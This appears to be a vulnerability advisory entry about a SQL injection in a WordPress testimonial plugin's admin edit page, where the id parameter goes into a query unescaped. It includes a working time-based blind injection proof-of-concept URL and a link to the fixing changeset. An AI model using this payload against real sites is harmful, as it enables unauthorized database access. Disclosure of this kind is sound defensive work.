EPSS
Percentile
36.7%
The plugin does not validate and escape the id parameter before using it in a SQL statement when retrieving a testimonial to edit, leading to a SQL Injection
https://example.com/wp-admin/admin.php?page=apct_testimonial_edit&id;=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
plugins.trac.wordpress.org/changeset/2664185